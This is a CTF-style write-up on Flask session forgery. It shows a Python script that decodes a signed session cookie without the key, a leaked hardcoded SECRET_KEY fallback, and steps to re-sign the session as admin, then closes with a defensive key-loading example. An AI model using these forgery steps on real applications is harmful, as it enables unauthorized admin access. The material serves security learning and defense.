Knowledge point: Flask session forgery
Flask stores the session on the client, in a cookie that is kept locally. Flask only signs the data. As is well known, a signature makes the data tamper-resistant but does not prevent it from being read. Flask does not provide encryption, so the entire session can be read on the client, which may cause some security issues.
This challenge leaks its source code, which is written with Flask. (I looked at some experts' writeups, which say that when you see Flask you should go straight to the routes) to determine what functionality it has.
Decode the session with a script:
```python
#!/usr/bin/env python3
"""Decode a Flask session cookie (signed, not encrypted) without the key."""
import sys
import zlib

from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    # Cookie layout: [.]<base64 payload>.<timestamp>.<signature>
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    # A leading dot marks a zlib-compressed payload
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception') from e

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload') from e

    # The signature is never checked here: reading the session needs no key
    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
```
Generating an admin session also requires the SECRET_KEY.
The SECRET_KEY was found in config.py:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
Take the session that was just decoded, replace the name with admin, and sign it again.
An encryption script for this can be found online.
Learning Link:
The flask session & Python Web Format string vulnerabilities
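The `or 'ckj123'` fallback in config.py is what lets anyone who has read the source sign a session. As an added example (not code from the challenge or from Flask), here is a config loader that fails closed instead; the names `load_secret_key`, `WeakSecretKey`, `new_secret_key` and the two thresholds are assumptions chosen for illustration.

```python
import math
import os
import secrets
from collections import Counter

# Weak pattern from the page's config.py, kept here only for comparison:
#   SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'

MIN_KEY_CHARS = 32       # assumption: shortest key accepted at startup
MIN_ENTROPY_BITS = 128   # assumption: floor for the rough entropy estimate


class WeakSecretKey(RuntimeError):
    """Raised at startup instead of running with a guessable signing key."""


def estimated_bits(key: str) -> float:
    """Rough estimate: Shannon entropy per character times key length."""
    counts = Counter(key)
    per_char = -sum(n / len(key) * math.log2(n / len(key))
                    for n in counts.values())
    return per_char * len(key)


def load_secret_key(environ=os.environ) -> str:
    """Return SECRET_KEY from the environment, or refuse to start."""
    key = environ.get("SECRET_KEY")
    if not key:
        # No literal fallback: a default in source leaks with the source
        raise WeakSecretKey("SECRET_KEY is not set")
    if len(key) < MIN_KEY_CHARS:
        raise WeakSecretKey("SECRET_KEY is shorter than %d chars" % MIN_KEY_CHARS)
    if estimated_bits(key) < MIN_ENTROPY_BITS:
        raise WeakSecretKey("SECRET_KEY looks low-entropy (repeated characters)")
    return key


def new_secret_key() -> str:
    """Generate a 256-bit random key to place in the deployment's secret store."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    # Constructed sample environments, not values from the challenge server
    print(load_secret_key({"SECRET_KEY": new_secret_key()})[:8] + "...")
    try:
        load_secret_key({})
    except WeakSecretKey as exc:
        print("refused:", exc)
```

Changing the key invalidates every cookie signed with the old one, so existing sessions stop verifying after the switch.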